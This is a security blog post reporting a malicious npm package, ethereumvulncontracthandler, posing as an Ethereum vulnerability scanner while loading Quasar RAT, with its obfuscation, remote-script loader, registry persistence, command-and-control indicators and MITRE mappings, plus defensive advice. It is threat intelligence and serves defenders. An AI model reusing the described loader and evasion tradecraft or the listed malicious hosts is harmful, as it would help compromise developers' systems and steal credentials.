Clement Brako Akomea Table of Contents
A malicious npm package, ethereumvulncontracthandler, disguised as a tool for detecting Ethereum smart contract vulnerabilities, has been uncovered deploying Quasar RAT, a powerful remote access trojan (RAT).
This alarming discovery by Socket researchers shows the growing trend of supply chain attacks targeting software developers.
Key Takeaway to Malicious NPM Package’s Quasar RAT
- Threat actors continue to use deceptive practices to exploit software supply chains, making vigilance and security essential for developers and organizations.
Malicious Actors on the Prowl: Hiding in Plain Sight
Researchers at Socket have uncovered a devious ploy by cybercriminals. They discovered a malicious NPM package cleverly disguised as a tool for detecting vulnerabilities in Ethereum smart contracts.
However, instead of safeguarding your system, this malicious package, named “ethereumvulncontracthandler”, deploys a nasty surprise: Quasar RAT, a highly versatile remote access trojan.
This malicious package was uploaded on December 18, 2024, by a threat actor using the alias “solidit-dev-416” on the npm registry.
Designed to be deceptive, upon installation, it retrieves a malicious script from a remote server, silently executing it in the background to deploy the RAT on unsuspecting Windows systems.
While the malicious package was still live on npm at the time of publishing this article, researchers have petitioned for its removal.
Breaking Down the Threat
How the Malicious Package Works
The npm package ethereumvulncontracthandler was published on December 18, 2024, by a threat actor using the alias “solidit-dev-416.”
Marketed as an AI-powered tool for Ethereum developers to identify vulnerabilities in smart contracts, the package secretly installs Quasar RAT upon execution.
How It Installs:
- Obfuscation: The malicious code is hidden behind multiple layers of Base64 encoding, XOR encoding, and function wrapping.
- Execution: Once installed, the package retrieves a remote script from
hxxps://jujuju.lat/files/kk.cmdand executes it silently. - Deployment: This script installs Quasar RAT on Windows systems, giving attackers remote access to the victim’s computer.
What is Quasar RAT?
Quasar RAT is a dangerous tool that has been around for nearly a decade and is a favorite among cybercriminals and APT (Advanced Persistent Threat) groups.
This RAT goes beyond just providing remote access to a victim’s machine. It boasts a robust arsenal of capabilities including:
- Keystroke logging
- Taking screenshots
- Stealing credentials
- Exfiltrating files
Imagine the potential damage this can cause, not just for individual developers but also for large organizations.
For instance, an Ethereum developer could have their private keys and credentials containing access to significant financial assets exposed.
Even more alarming, if a large organization’s development systems were compromised with Quasar RAT, this could pave the way for a large-scale data breach across the entire enterprise.
Quasar RAT’s Capabilities
Quasar RAT is not new to the cybercrime scene. It’s been widely used in attacks for its robust features, including:
- Keystroke logging to steal sensitive information.
- Screenshot capturing to monitor user activity.
- Credential harvesting for further exploitation.
- File exfiltration, allowing attackers to steal valuable data.
For Ethereum developers, the implications are severe. Private keys and credentials linked to financial assets can be exposed, potentially resulting in significant monetary loss.
Threat Actor’s Strategy
To evade detection, the attacker employed several deceptive tactics:
- System Checks: The package verified system resources to avoid execution in virtual environments or analysis sandboxes.
- Persistent Malware: The RAT modified the Windows Registry to ensure it restarts after system reboots.
- Deceptive Naming: It renamed itself to
client.exeto avoid suspicion.
This level of sophistication shows how determined attackers are in targeting software developers and enterprises.
Deception by Design: How Did They Do It?
The threat actors behind this malicious package went to great lengths to ensure it remained hidden and undetected for as long as possible. Here are some of the cunning tactics they employed:
- Obfuscation Obfuscation Everywhere: The code for “ethereumvulncontracthandler” was heavily obfuscated using multiple layers, making it extremely difficult to analyze and understand. Techniques like Base64 and XOR encoding, function wrapping, and minification were all used to hinder static analysis and evade detection by security software.
- Resourceful and Cautious: The malicious code also included checks to verify system resources, such as available memory, to avoid execution in automated analysis sandboxes typically used to detect malware.
- Cunning Delivery System: The initial npm package acted as a loader, cleverly retrieving and executing Quasar RAT from a remote server, adding another layer of deception.
The Malware’s Nefarious Actions
Once the malicious NPM package is installed, it initiates a two-step attack:
- Download and Installation: The package downloads a malicious script from a remote server.
- Taking Root: Upon execution, the script runs hidden PowerShell commands, silently installing Quasar RAT (SHA256: 9c3d53c7723bfdd037df85de4c26efcd5e6f4ad58cc24f7a38a774bf22de3876) on the victim’s system.
To ensure persistence and continued operation after a system reboot, the malware modifies a key in the Windows registry, adding itself to the startup sequence. It cleverly renames itself to the innocuous-sounding “client.exe” to avoid raising any suspicion.
With Quasar RAT now firmly established, the focus shifts to maintaining control and stealing data. The malware communicates with a command and control server (C2 server) located at IP address: 154.216.17.47 to receive instructions and exfiltrate stolen data.
This C2 server likely serves as a central hub, allowing the threat actors to manage and control multiple compromised devices, potentially forming a large botnet.
The victim’s machine is now under the complete control of the threat actor, who can monitor their activities, steal sensitive information, and use the compromised system for further malicious activities.
Recommendations and Mitigations
This incident highlights the importance of robust security practices, particularly when dealing with third-party code. Here are some key recommendations:
- Scrutinize Third-Party Code: Exercise extreme caution when incorporating third-party code into your projects. Especially be wary of packages claiming advanced functionalities or those coming from unknown or less reputable sources.
- Monitor Network Traffic: Keep a close eye on your network traffic for any unusual outbound connections. These could be a sign of a compromised system communicating with a C2 server.
- Investigate Unexpected File Modifications: Regularly check for any unexpected changes to files on your system. This could indicate malicious activity.
- Use Security Tools: Employ reputable security tools to continuously assess the integrity of your software dependencies. Tools like Socket’s GitHub app, CLI tool, or browser extension can provide valuable real-time insights into the security of your supply chain, alerting you to potentially malicious components. This is especially important as we see more cases of malicious obfuscated NPM package disguised as an Ethereum tool.
- Stay Updated: Keep your systems and software up to date with the latest security patches. This helps to close known vulnerabilities that attackers could exploit.
The Future of Supply Chain Attacks
Unfortunately, I anticipate that these types of supply chain attacks will continue to rise in frequency and sophistication.
Attackers are constantly seeking new ways to infiltrate systems, and compromising the software supply chain offers a highly effective way to reach a large number of victims through a single point of entry.
We must remain vigilant and proactive in our security measures to combat this growing threat.
Indicators of Compromise (IOCs)
These are key pieces of information that can help you identify if your system has been compromised:
| IOC Type | Value |
|---|---|
| Malicious npm Package | ethereumvulncontracthandler |
| Quasar RAT SHA256 | 9c3d53c7723bfdd037df85de4c26efcd5e6f4ad58cc24f7a38a774bf22de3876 |
| Malicious Download URL | hxxps://jujuju[.]lat/files/kk.cmd (defanged) |
| C2 Server | captchacdn[.]com:7000 |
| C2 IP Address | 154.216.17[.]47 |
MITRE ATT&CK Techniques
The attack employed several tactics and techniques documented in the MITRE ATT&CK framework:
| Technique ID | Technique Name |
|---|---|
| T1195.002 | Supply Chain Compromise: Compromise Software Supply Chain |
| T1059.007 | Command and Scripting Interpreter: JavaScript |
| T1036.005 | Masquerading: Match Legitimate Name or Location |
| T1027 | Obfuscated Files or Information |
| T1059.001 | Command and Scripting Interpreter: PowerShell |
| T1546.016 | Event Triggered Execution: Installer Packages |
| T1105 | Ingress Tool Transfer |
| T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys |
| T1056.001 | Input Capture: Keylogging |
| T1113 | Screen Capture |
| T1005 | Data from Local System |
| T1071.001 | Application Layer Protocol: Web Protocols |
| T1041 | Exfiltration Over C2 Channel |
Real-Life Example of Supply Chain Attacks
This recent attack reminds me of the Codecov supply chain attack in 2021. Codecov Supply Chain Attack [invalid URL removed] where attackers compromised Codecov’s Bash Uploader script, potentially exposing secrets from numerous customer repositories.
This incident, just like the malicious NPM package incident, emphasizes the critical need for robust supply chain security.
Mitigating the Risk
To protect against similar threats:
- Use Trusted Tools: Employ security tools like Socket’s GitHub app to monitor your dependencies.
- Monitor Network Activity: Check for unusual outbound connections that may indicate malicious activity.
- Review Packages Carefully: Avoid installing packages from unknown authors without verifying their authenticity.
- Train Your Team: Educate developers on identifying suspicious code and dependencies.
Forecast: The Rising Threat of Supply Chain Attacks
As software development becomes increasingly collaborative, threat actors are likely to continue targeting platforms like npm, PyPI, and GitHub. The trend indicates a need for stricter controls and better awareness among developers.
Expect more tools to emerge that enhance transparency and security in software supply chains.
Rounding Up
The discovery of a malicious obfuscated NPM package disguised as an Ethereum tool, deploying Quasar RAT, is a stark reminder of the ever-evolving threat landscape. It underscores the critical need for vigilance and robust security practices, especially when dealing with third-party code.
By staying informed, employing effective security tools, and adopting a proactive approach to security, we can better protect ourselves from these types of attacks.
It is essential to be aware of the risks involved with any downloaded package, especially a malicious obfuscated NPM package disguised as an Ethereum tool.
About Socket
Socket is a trusted platform offering tools to enhance the security of software supply chains. Their GitHub app and CLI tool provide real-time monitoring and alerts for suspicious activities. Learn more at Socket.dev.
FAQs
What is the ethereumvulncontracthandler package?
- It’s a malicious npm package disguised as a tool for detecting vulnerabilities in Ethereum smart contracts but actually deploys Quasar RAT.
What is Quasar RAT?
- Quasar RAT is a remote access trojan capable of logging keystrokes, capturing screenshots, stealing credentials, and exfiltrating files.
How can developers protect themselves from such threats?
- Use trusted tools for monitoring dependencies, carefully vet third-party code, and monitor network activity for unusual connections. Scrutinize third-party code, monitor network traffic, investigate unexpected file modifications, use security tools, and keep your systems updated.
What makes supply chain attacks so dangerous?
- They exploit trusted software ecosystems, potentially compromising thousands of users or organizations with a single malicious package.
Are there tools to detect malicious packages?
- Yes, tools like Socket’s GitHub app and CLI tool can help identify and block suspicious packages.
What is an NPM package?
- NPM (Node Package Manager) is a package manager for the JavaScript programming language. It is used to share and manage reusable pieces of code called packages.
What is obfuscation?
- Obfuscation is the process of making code difficult to understand, making it harder for security researchers to analyze and detect malicious behavior.
What should I do if I think I’ve been infected?
- Disconnect your computer from the network, run a full system scan with a reputable antivirus program, and consider reinstalling your operating system.
Is this the first time a malicious NPM package has been discovered?
- No, malicious packages are unfortunately found periodically. This highlights the importance of vigilance when using any third-party code. Example of a previous NPM attack [invalid URL removed]
What is the significance of the Ethereum connection?
- Ethereum, being associated with cryptocurrencies and valuable digital assets, makes it a prime target for attackers seeking financial gain.
How can I stay updated on these types of threats?
- Follow reputable security blogs, news sites, and organizations like Socket to stay informed about the latest threats and vulnerabilities. Check out CISA for more information
